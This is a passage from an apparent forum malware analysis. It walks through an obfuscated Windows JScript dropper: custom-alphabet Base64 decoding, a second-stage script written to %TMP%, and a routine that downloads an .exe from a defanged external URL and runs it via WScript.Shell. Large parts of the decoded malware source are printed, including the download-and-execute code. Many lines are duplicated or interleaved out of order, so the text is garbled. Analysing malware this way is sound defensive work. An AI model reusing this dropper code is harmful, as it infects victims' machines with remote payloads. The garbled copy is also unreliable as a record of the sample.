"*"
".*eIaYIYldRrHuT*GrvzT*j*BakthiR*CxrYlRq*s*bfChCjgqMNlT*iLeRZYVEahVuy"
"*"
"run"
What looks like strange strings, are in fact used later by the script, when needed.
Several different manipulations are done to deobfuscate "strings" , in this sample.
One example for the moment :
"PoqenCjbNUOCtd*ZcAHzCdKaOITn*w*lqmOs*scrip*AlkhTmE*wxjsk*NpvTpRkvn*t.e*CsjMH*xe
=> wscript.exe
2.2) Timer and other important tab :
caIjqKdglgHJ = new String();
var llstSfBy = new Date();
while (true) {
var dSbro = new Date();
var oZnEUHR = new Date(dSbro.getTime() - llstSfBy.getTime());
if (oZnEUHR.getSeconds() > 5) {
caIjqKdglgHJ =var oZnEUHR = new Date(dSbro.getTime() - llstSfBy.getTime());
if (oZnEUHR.getSeconds() > 5) {
["Z", "B", "z", "k", "3", "E", "F", "G", "H", "I", "J", "K", "L", "a", "b", "c", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "A", "0", "1", "2", "4", "6", "7", "8", "9", "M", "N", "O", "d", "e", "f", "g", "h", "i", "j", "5", "D", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "C", "+", "/", "="];
break;}
}
The script wait 5 seconds and then create a tab of chars :
=> if I put it on a string, you will see better what is the function of this tab
"ZBzk3EFGHIJKLabcPQRSTUVWXYA01246789MNOdefghij5DlmnopqrstuvwxyC+/="
"ZBzk3EFGHIJKLabcPQRSTUVWXYA01246789MNOdefghij5DlmnopqrstuvwxyC+/="
=> base 64 chars and =, in another order than usually used
=> to make a pseudo Base64 Decode, on chars encoded with this order
Their decoding function :
function jnMWjogwsmcQ(string_to_be_decoded) {
...
...
}
2-3) What is hidden in this long string !?=> to make a pseudo Base64 Decode, on chars encoded with this order
Their decoding function :
function jnMWjogwsmcQ(string_to_be_decoded) {
...
...
}
var tQsqVjHOaCz = jnMWjogwsmcQ("kPgd2VvM2FOl09BdQdnlVTgu1NrnJ32N2F2wTeQhKFnvRVU313rXSV5319N74q2N2F2wTeQhKOIr098j4TOOQGBaV3riQGHjHkBuLRm7LG7mJS5CkPflJd8A2VU3Rsa84FEq0dQa1W2O0GIFSWIt23vsYEIp0sg30WEDRq8n1EElRTnA2FgBTT25AWYlR3YoXNvpSFYt1d85VdIKQtBsVUgKVFQ3XNY3XqYSQTgnRT5g4NE8SU8pYdUNRVQvRWUBQFYMPN2jQ3np1t2fVWQF2sgEPqO5TdrsTTEgTVgs0e29UVIqQEBr03IwUFUeTGUzYFauRNYdXd2t1TaWSqI8SGaMU3UqSdYdQEgh2V8EYVERUVrOTqvIAOYBTG25XT2rPqThKsOO2d2b2G2H1GgzUePfJSjazeY819BKArUdQ9ZCHEj9AGQq1kflKsQh1GIO1tQgYsTD0dUqKp3nLSZmLzCj0s2pKsnlYtLD1F8mHOqxkPgsXWH7UTUaRkqsLp15aMLtbmqJ2s8g0FTf2GIrYRN74mqJAVXfRs5UYNXD0FUDYtQfckquLMP5bkHqJRB91dU8ApjazeY819BBXU2kHkq7PdnjXqaeAR7gHzT7Rs5UYNXD0FUDYtQfbmqJ2dEoH3nBTd8qAVElUMrKArUdQO5BXU2kWSjazeY819B5QN
...
...
");
tQsqVjHOaCz will contains the special Base64 decoded string that contains very important parts:
I put in red and blue bold what may be well looked
"
function fFloYJxrMq(GdtgzRtj,lyIeDpMXMkDr) {
/*hZueDKcaxatndMqwelrFMrwtNvdRsojDmqnKHqpQoILZtjAQGmivoHFrbNsLfwrhmZbKGpvYZKXdDbFDcFSEJqIKizAaMXsfedIdyIuADfcBGlDLsswhYtFwjECImRmvQAiQjvnwbUbtDPulBzTegPuBdcxJFfbgwqCWOBaLscTEtNffDZjuhEeaRUmeSNIjVAPwmaGuCE*/
ievgNtwHpzBVt();
var KkUfF = ["http ://djprestige.net/111000/logs/logs.php"];
var UEMH=637-637;
while(true) {
function DwfHWk(hYTCRr){
function NXbWm(mCUmexcU,KFvNO,rvXDAccOxN){
function nGQI(XKowap,LhcfAni){
function NLqcZ(NdPrkNQo,hDYOkm,DpwZyRyCb){
function ievgNtwHpzBVt() {
/*xzFsWaRFUg().Sleep(5390-457);*/
}
function iREZTlp(){
function dcdEgRlK(oHaxAbhhn) {
function gTHAzTo(LmvV,SYiUv) {
function xzFsWaRFUg() {
function OtcrlNKfx(BMJavz) {
function tVYh(TWHSDTw,ZjePGWv) {
function MsCkKpm(pIaLc) {
function BllcCgi() {
function ZMXXuqDs(YwbAV) {
function FjceKtzTtdcNGT(ygVSYOjHodWpET) {
"
function fFloYJxrMq(GdtgzRtj,lyIeDpMXMkDr) {
GdtgzRtj.Run(lyIeDpMXMkDr, 0x1, 0x0);
}ievgNtwHpzBVt();
var KkUfF = ["http ://djprestige.net/111000/logs/logs.php"];
var UEMH=637-637;
while(true) {
if(KkUfF.length<=824-824) break;
var AaWC = BllcCgi() % KkUfF.length;
var LARhtiaoV=KkUfF[AaWC];
var mFGoe=BllcCgi();
var hUbTAlCkvX='xgRqdfZ_'+mFGoe +'.exe';
var SJQWojo='xgRqdfZ_'+mFGoe +'.exe';
var AHsFmJCp=877-876;
var oidVjrlxN = function(){
var SJQWojo = DwfHWk(oidVjrlxN) + String.fromCharCode(92) + SJQWojo;
var CDKBT = function(){
nGQI(LARhtiaoV,CDKBT);
if (CDKBT.status == 100+100) {
try {
UEMH++;
KkUfF.splice (AaWC,460-459);
}var AaWC = BllcCgi() % KkUfF.length;
var LARhtiaoV=KkUfF[AaWC];
var mFGoe=BllcCgi();
var hUbTAlCkvX='xgRqdfZ_'+mFGoe +'.exe';
var SJQWojo='xgRqdfZ_'+mFGoe +'.exe';
var AHsFmJCp=877-876;
var oidVjrlxN = function(){
return new ActiveXObject(NLqcZ('WS&niOiBwhcg&cript&niOiBwhcg&.She&l&l',[0,2,4,5,6],'&'));
}();var SJQWojo = DwfHWk(oidVjrlxN) + String.fromCharCode(92) + SJQWojo;
var CDKBT = function(){
return new ActiveXObject(NLqcZ('MSX&PRNJPlMpg&ML2.XM&hYYzXVOhACp&LHTTP',[0,2,4],'&'));
}();nGQI(LARhtiaoV,CDKBT);
if (CDKBT.status == 100+100) {
var xvtZQuA = function() {
var fwGzkhGPhaog=NXbWm(xvtZQuA,CDKBT.ResponseBody,SJQWojo);
}return new ActiveXObject(NLqcZ('ADO&DB&NhrHELmvq&.&DMIkBQbWW&Stream',[0,1,3,5],'&'));
}();var fwGzkhGPhaog=NXbWm(xvtZQuA,CDKBT.ResponseBody,SJQWojo);
try {
fFloYJxrMq(oidVjrlxN,SJQWojo);
var LxaYiEy = GetObject('winmgmts:{impersonationLevel=impersonate}').ExecQuery('Select * from Win32_Process Where Name = \\''+hUbTAlCkvX+'\\'');
if ( LxaYiEy.Count >= 1 ){
} catch(e) {}var LxaYiEy = GetObject('winmgmts:{impersonationLevel=impersonate}').ExecQuery('Select * from Win32_Process Where Name = \\''+hUbTAlCkvX+'\\'');
if ( LxaYiEy.Count >= 1 ){
break;
}UEMH++;
KkUfF.splice (AaWC,460-459);
function DwfHWk(hYTCRr){
var IycTzaXN=["ExpandEnvironmentStrings"];
return hYTCRr[IycTzaXN[0]]('%TMP%')
}return hYTCRr[IycTzaXN[0]]('%TMP%')
function NXbWm(mCUmexcU,KFvNO,rvXDAccOxN){
try{
catch(e){}
}mCUmexcU.open();
dcdEgRlK(mCUmexcU);
gTHAzTo(mCUmexcU,KFvNO);
OtcrlNKfx(mCUmexcU);
tVYh(mCUmexcU,rvXDAccOxN);
iGZCSRAS=mCUmexcU.size;
MsCkKpm(mCUmexcU);
return iGZCSRAS;
}dcdEgRlK(mCUmexcU);
gTHAzTo(mCUmexcU,KFvNO);
OtcrlNKfx(mCUmexcU);
tVYh(mCUmexcU,rvXDAccOxN);
iGZCSRAS=mCUmexcU.size;
MsCkKpm(mCUmexcU);
return iGZCSRAS;
catch(e){}
function nGQI(XKowap,LhcfAni){
try{
catch(e){}
}uyMW = 'G*RXeyIPlrFs*E*T*HITxpbjyJANk'.split('*');
LhcfAni.open(uyMW[0]+uyMW[2]+uyMW[3], XKowap, false);
LhcfAni.setRequestHeader("User-Agent", "Python-urllib/3.1");
LhcfAni.send();
}LhcfAni.open(uyMW[0]+uyMW[2]+uyMW[3], XKowap, false);
LhcfAni.setRequestHeader("User-Agent", "Python-urllib/3.1");
LhcfAni.send();
catch(e){}
function NLqcZ(NdPrkNQo,hDYOkm,DpwZyRyCb){
ELGAP=NdPrkNQo.split(DpwZyRyCb);
RCerksA = 'kwN';
for(QtfdnNuX=0;QtfdnNuX<hDYOkm.length;QtfdnNuX++) {
return RCerksA.substring(3,RCerksA.length);
}RCerksA = 'kwN';
for(QtfdnNuX=0;QtfdnNuX<hDYOkm.length;QtfdnNuX++) {
RCerksA+=ELGAP[hDYOkm[QtfdnNuX]];
}return RCerksA.substring(3,RCerksA.length);
function ievgNtwHpzBVt() {
}
function iREZTlp(){
var PfySEO=["random"];
return Math[PfySEO[0]]()
}return Math[PfySEO[0]]()
function OYRG(qqGjrm) {qqGjrm.open();
}function dcdEgRlK(oHaxAbhhn) {
oHaxAbhhn.type=1;
}function gTHAzTo(LmvV,SYiUv) {
LmvV.write(SYiUv);
}function xzFsWaRFUg() {
return/*LiDIlHHYQgtUykxOIYfyrbdpZyBgDUloDttFWBKygwvKhJlGxtsfZfCzmYZFjCwQpYdXAOGsrfqTKBSRfhzgACVctRryJFALUWGHYvvFu*/WScript;
}function OtcrlNKfx(BMJavz) {
var CaGOHdTYym=[];
BMJavz.position=CaGOHdTYym.length*(5229892-628);
}BMJavz.position=CaGOHdTYym.length*(5229892-628);
function tVYh(TWHSDTw,ZjePGWv) {
TWHSDTw.saveToFile(ZjePGWv, 2);
}function MsCkKpm(pIaLc) {
pIaLc.close();
}function BllcCgi() {
var YSrn=100000;
var TCcqLl = 100;
return Math.round(iREZTlp()*(YSrn-TCcqLl)+TCcqLl);
}var TCcqLl = 100;
return Math.round(iREZTlp()*(YSrn-TCcqLl)+TCcqLl);
function ZMXXuqDs(YwbAV) {
var UpaZeRXt='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';
for(var QGWQw=0;QGWQw<YwbAV;QGWQw++){
return hcAQr;
}for(var QGWQw=0;QGWQw<YwbAV;QGWQw++){
hcAQr+=UpaZeRXt.charAt(Math.floor(Math.random()*UpaZeRXt.length));
}return hcAQr;
function FjceKtzTtdcNGT(ygVSYOjHodWpET) {
return new ActiveXObject(ygVSYOjHodWpET);
}"
Look at this function, called several times NLqcZ :
One example :
return new ActiveXObject(NLqcZ('WS&niOiBwhcg&cript&niOiBwhcg&.She&l&l',[0,2,4,5,6],'&'));
it works like this :
- separate the string in several parts by spliting it with the char '&'
- use the values on the tab to make the string decoded
WS
niOiBwhcg
cript
niOiBwhcg
.She
l
l
=> new ActiveXObject("WScript.shell")
The same way for :it works like this :
- separate the string in several parts by spliting it with the char '&'
- use the values on the tab to make the string decoded
WS
niOiBwhcg
cript
niOiBwhcg
.She
l
l
=> new ActiveXObject("WScript.shell")
new ActiveXObject("MSXML2.XMLHTTP")
new ActiveXObject("ADODB.Stream")
new ActiveXObject("ADODB.Stream")
Another method used : direct builduyMW = 'G*RXeyIPlrFs*E*T*HITxpbjyJANk'.split('*'); => "GET"
Payload :
xgRqdfZmFGoe.exe
URL:
var KkUfF = ["http: //djprestige.net/111000/logs/logs.php"];
var AaWC = BllcCgi() % KkUfF.length; => to obfuscate a bit more : get a random valid index
var LARhtiaoV=KkUfF[AaWC]; => retrieve the URL at index AaWC
=> the URL used will be "completely removed from the array of URLS
=> here : only one URL used => next loop, exit the script
=> LARhtiaoV = http://djprestige.net/111000/logs/logs.php
function nGQI(XKowap,LhcfAni){
try{
catch(e){}
}uyMW = 'G*RXeyIPlrFs*E*T*HITxpbjyJANk'.split('*'); => "GET"
LhcfAni.open(uyMW[0]+uyMW[2]+uyMW[3], XKowap, false);
LhcfAni.setRequestHeader("User-Agent", "Python-urllib/3.1");
LhcfAni.send();
}LhcfAni.open(uyMW[0]+uyMW[2]+uyMW[3], XKowap, false);
LhcfAni.setRequestHeader("User-Agent", "Python-urllib/3.1");
LhcfAni.send();
catch(e){}
nGQI(LARhtiaoV,CDKBT);
if (CDKBT.status == 100+100) { => 200 : HTTP OK
var xvtZQuA = function() {
var fwGzkhGPhaog=NXbWm(xvtZQuA,CDKBT.ResponseBody,SJQWojo);
}return new ActiveXObject(NLqcZ('ADO&DB&NhrHELmvq&.&DMIkBQbWW&Stream',[0,1,3,5],'&'));
}();var fwGzkhGPhaog=NXbWm(xvtZQuA,CDKBT.ResponseBody,SJQWojo);
try {
fFloYJxrMq(oidVjrlxN , SJQWojo); => run
var LxaYiEy = GetObject('winmgmts:{impersonationLevel=impersonate}').ExecQuery('Select * from Win32_Process Where Name = \\''+hUbTAlCkvX+'\\'');
if ( LxaYiEy.Count >= 1 ){ => xgRqdfZmFGoe.exe already in memory ?
} catch(e) {}var LxaYiEy = GetObject('winmgmts:{impersonationLevel=impersonate}').ExecQuery('Select * from Win32_Process Where Name = \\''+hUbTAlCkvX+'\\'');
if ( LxaYiEy.Count >= 1 ){ => xgRqdfZmFGoe.exe already in memory ?
break;
}UEMH++; => useless
KkUfF.splice (AaWC,460-459); => useless
3) When this hidden part is used ?
The all functions and part we have seen in 2) parts, are in a var, once decoded.
...
...
var tQsqVjHOaCz = jnMWjogwsmcQ("kPgd2VvM2FOl09BdQdnlVTgu1NrnJ32N2F2wTeQhKFnvRVU313rXSV5319N74q2N2F2wTeQhKOIr098j4TOOQGBaV3riQGHjHkBuLRm7LG7mJS5CkPflJd8A2VU3Rsa84FEq0dQa1W2O0GIFSWIt23vsYEIp0sg30WEDRq8n1EElRTnA2FgBTT25AWYlR3YoXNvpSFYt1d85VdIKQtBsVUgKVFQ3XNY3XqYSQTgnRT5g4NE8SU8pYdUNRVQvRWUBQFYMPN2jQ3np1t2fVWQF2sgEPqO5TdrsTTEgTVgs0e29UVIqQEBr03IwUFUeTGUzYFauRNYdXd2t1TaWSqI8SGaMU3UqSdYdQEgh2V8EYVERUVrOTqvIAOYBTG25XT2rPqThKsOO2d2b2G2H1GgzUePfJSjazeY819BK
...............................
dQl0R7gJOUmXUgOTO8qKdnO0d2qAzNgbtroYWQr1du7AFaBTWHx6PqJYeUDXtQg0su7QdgMYT5q4OQqYFabQrPf4V2VTrOcAN8lYE2mQUPgHG5oYWQr1du70dUtH3EM2FOsYU8cXdgOXtPf4V2VTrOcAN8lYE2mQUPgbtqaz7==");
This is what are called after, you must remember the first tab decoded :
TmOQLQMiKBSHZM :
"kVM"
"Scripting.FileSystemObject"
"WScript.Shell"
"dDhUJJXRFIby"
""
""
"rJkPmHviSOtsKL*%T*TcDCPgOddyZrV*KXgTimAfZ*mnCHcusuyqfLQp*M*UXuarIJvx*P%*xlxdiqvK"
"*"
"PoqenCjbNUOCtd*ZcAHzCdKaOITn*w*lqmOs*scrip*AlkhTmE*wxjsk*NpvTpRkvn*t.e*CsjMH*xe *YDeCJLfTrlkAvu"
"*"
".*eIaYIYldRrHuT*GrvzT*j*BakthiR*CxrYlRq*s*bfChCjgqMNlT*iLeRZYVEahVuy"
"*"
"run"
"Scripting.FileSystemObject"
"WScript.Shell"
"dDhUJJXRFIby"
""
""
"rJkPmHviSOtsKL*%T*TcDCPgOddyZrV*KXgTimAfZ*mnCHcusuyqfLQp*M*UXuarIJvx*P%*xlxdiqvK"
"*"
"PoqenCjbNUOCtd*ZcAHzCdKaOITn*w*lqmOs*scrip*AlkhTmE*wxjsk*NpvTpRkvn*t.e*CsjMH*xe *YDeCJLfTrlkAvu"
"*"
".*eIaYIYldRrHuT*GrvzT*j*BakthiR*CxrYlRq*s*bfChCjgqMNlT*iLeRZYVEahVuy"
"*"
"run"
var aEDGtMwt = function() {
return new /*nzknJaFEhAKPCE*/ ActiveXObject(TmOQLQMiKBSHZM[1]); => "Scripting.FileSystemObject"
}();var obWnumtlk = function() {
return WScript.CreateObject(TmOQLQMiKBSHZM[2]); => "WScript.Shell"
}();EXPLANATIONS :
cJsHVL(aEDGtMwt, dbusESbAHhk(), tQsqVjHOaCz); => third parameter, the hidden part on the long string we have seen before !
function cJsHVL(aEDGtMwt, VjTGaiNuUBPgF, mqUyTKyNSmm) {
function XkEZqeLzGdBEgB(miETtK, QADeBTGed) {
return miETtK.createtextfile(QADeBTGed, true);
}
var TpMPzXgtwzTg = XkEZqeLzGdBEgB(UvzvIA, VjTGaiNuUBPgF);
TpMPzXgtwzTg.WriteLine(mqUyTKyNSmm);
TpMPzXgtwzTg.Close();
}TpMPzXgtwzTg.WriteLine(mqUyTKyNSmm);
TpMPzXgtwzTg.Close();
function XkEZqeLzGdBEgB(miETtK, QADeBTGed) {
return miETtK.createtextfile(QADeBTGed, true);
}
With :
- aEDGtMwt : File System Object
- dbusESbAHhk() : %TEMP%\dDhUJJXRFIby.js (=> String.fromCharCode(92) : \ )
function dbusESbAHhk() {
return obWnumtlk.ExpandEnvironmentStrings('%T' + 'MP%') + String.fromCharCode(92) + 'dDhUJJXRFIby.js'
}In fact, the hidden part is written on a temp js file : dDhUJJXRFIby.js
AfzFZ(obWnumtlk, MACECTYk() + vieag() + String.fromCharCode(92) + TmOQLQMiKBSHZM[3] + FhMKtMKvYiYM());
=>
(1) obWnumtlk :
var obWnumtlk = function() {
(2) MACECTYk() + vieag() + String.fromCharCode(92) + TmOQLQMiKBSHZM[3] + FhMKtMKvYiYM() :return WScript.CreateObject(TmOQLQMiKBSHZM[2]); => "WScript.Shell"
}();function MACECTYk() {
return obWnumtlk.ExpandEnvironmentStrings(omYcXJw())
}
=>
=> Expands environment-variable strings and replaces them with the values defined for the current user.
String.fromCharCode(92)
=> ".*eIaYIYldRrHuT*GrvzT*j*BakthiR*CxrYlRq*s*bfChCjgqMNlT*iLeRZYVEahVuy"
=> ".*eIaYIYldRrHuT*GrvzT*j*BakthiR*CxrYlRq*s*bfChCjgqMNlT*iLeRZYVEahVuy"
=> ".js"
return ZmDvKDROUbeY(TmOQLQMiKBSHZM[8], [2, 4, 8, 10], TmOQLQMiKBSHZM[9]);
}=>"PoqenCjbNUOCtd*ZcAHzCdKaOITn*w*lqmOs*scrip*AlkhTmE*wxjsk*NpvTpRkvn*t.e*CsjMH*xe *YDeCJLfTrlkAvu"
=> Remember how they retrieves good strings : tab of number and a split char
"PoqenCjbNUOCtd*ZcAHzCdKaOITn*w*lqmOs*scrip*AlkhTmE*wxjsk*NpvTpRkvn*t.e*CsjMH*xe
=> "script.exe " (with a blank char at the end)
function vieag() {=> Remember how they retrieves good strings : tab of number and a split char
"
=> "script.exe " (with a blank char at the end)
return obWnumtlk.ExpandEnvironmentStrings(omYcXJw())
}
=>
function omYcXJw() {
=>
"rJkPmHviSOtsKL*%T*TcDCPgOddyZrV*KXgTimAfZ*mnCHcusuyqfLQp*M*UXuarIJvx*P%*xlxdiqvK"
=> "rJkPmHviSOtsKL*%T*TcDCPgOddyZrV*KXgTimAfZ*mnCHcusuyqfLQp*M*UXuarIJvx*P%*xlxdiqvK"
=> %TMP% return ZmDvKDROUbeY(TmOQLQMiKBSHZM[6], [1, 5, 7], TmOQLQMiKBSHZM[7]);
}=>
"rJkPmHviSOtsKL*%T*TcDCPgOddyZrV*KXgTimAfZ*mnCHcusuyqfLQp*M*UXuarIJvx*P%*xlxdiqvK"
=> "
=> Expands environment-variable strings and replaces them with the values defined for the current user.
String.fromCharCode(92)
=> char : \
TmOQLQMiKBSHZM[3]
=> "dDhUJJXRFIby"
function FhMKtMKvYiYM() {
return ZmDvKDROUbeY(TmOQLQMiKBSHZM[10], [0, 3, 6], TmOQLQMiKBSHZM[11]);
}=> ".*eIaYIYldRrHuT*GrvzT*j*BakthiR*CxrYlRq*s*bfChCjgqMNlT*iLeRZYVEahVuy"
=> ".
=> ".js"
Conclusion :AfzFZ(obWnumtlk, MACECTYk() + vieag() + String.fromCharCode(92) + TmOQLQMiKBSHZM[3] + FhMKtMKvYiYM());
Can be simplified :
shell.Run("command here");
"script.exe " + "%TMP%\" + "dDhUJJXRFIby.js"
Run the new js file : dDhUJJXRFIby.js
function AfzFZ(EOJUGdwva, upIslkONuZdKS) {
var zbqgCbCVWwkid = [TmOQLQMiKBSHZM[12]]; => in the famous first tab : "run"
EOJUGdwva[zbqgCbCVWwkid[0]]
(upIslkONuZdKS, 0x1, 0x0)
}
=> run(upIslkONuZdKS, 0x1, 0x0)
4) Summary :var zbqgCbCVWwkid = [TmOQLQMiKBSHZM[12]]; => in the famous first tab : "run"
EOJUGdwva[zbqgCbCVWwkid[0]]
(upIslkONuZdKS, 0x1, 0x0)
}
=> run(upIslkONuZdKS, 0x1, 0x0)
This sample script :
- deobfuscates the real part, that was on a var string encrypted in a sort of Base64 (in another order),
- writes this content on a new js file : dDhUJJXRFIby.js
- and runs it
dDhUJJXRFIby.js :- writes this content on a new js file : dDhUJJXRFIby.js
- and runs it
- downloads the payload : xgRqdfZmFGoe.exe
- from http: //djprestige.net/111000/logs/logs.php
- runs it
5) Conclusion :
A lot of parts could be analysed to show all useless parts wrote to make hardest to understand the code. I won't details more than above, I think it was sufficient to understand the method used
If you have any question, I will be happy to answer
Last edited:
